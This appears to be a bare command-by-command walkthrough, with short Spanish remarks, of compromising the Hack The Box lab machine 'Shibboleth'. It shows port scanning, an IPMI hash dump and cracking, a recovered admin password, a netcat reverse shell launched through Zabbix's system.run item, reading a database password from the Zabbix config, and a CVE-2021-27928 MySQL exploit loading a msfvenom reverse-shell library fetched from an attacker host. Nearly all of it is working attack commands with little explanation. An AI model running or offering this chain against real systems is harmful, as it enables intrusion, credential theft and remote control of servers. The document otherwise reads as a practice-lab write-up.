nmap -A -p- -oA shibboleth 10.129.188.117 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA shibboleth 10.129.188.117
nmap -sU -O -p- -oA shibboleth-udp 10.129.188.117
nikto -h 10.129.188.117:8500
gobuster vhost -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt" -u "shibboleth.htb" -r
msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts monitor.shibboleth.htb
run
Administrator:68f06f1e82010000b5ae67010aa2771364c8e73cd9baefa356ab685edbaf53a462ad2febc0822661a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e2c24922308e07c7fccde5dc8820b124b70fac61
hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o hash --potfile-disable -D 1 --force
Nos dirigimos a http://monitor.shibboleth.htb/ Usamos las credenciales Administrator : ilovepumkinpie1
Configuration-> Items
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.65 443 >/tmp/f &,nowait]
nc -lvnp 443
Le damos click a Test y despues a Get value and test
python3 -c 'import pty; pty.spawn("/bin/bash")'
cat /etc/passwd
su ipmi-svc
ilovepumkinpie1
cat /etc/zabbix/zabbix_server.conf | grep DB
https://github.com/Al1ex/CVE-2021-27928
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f elf-so -o shell.so
nc -lvnp 4444
python3 -m http.server 80
wget http://10.10.x.x/shell.so
mysql -h localhost -D zabbix -u zabbix -p'bloooarskybluh'
SET GLOBAL wsrep_provider="/tmp/shell.so";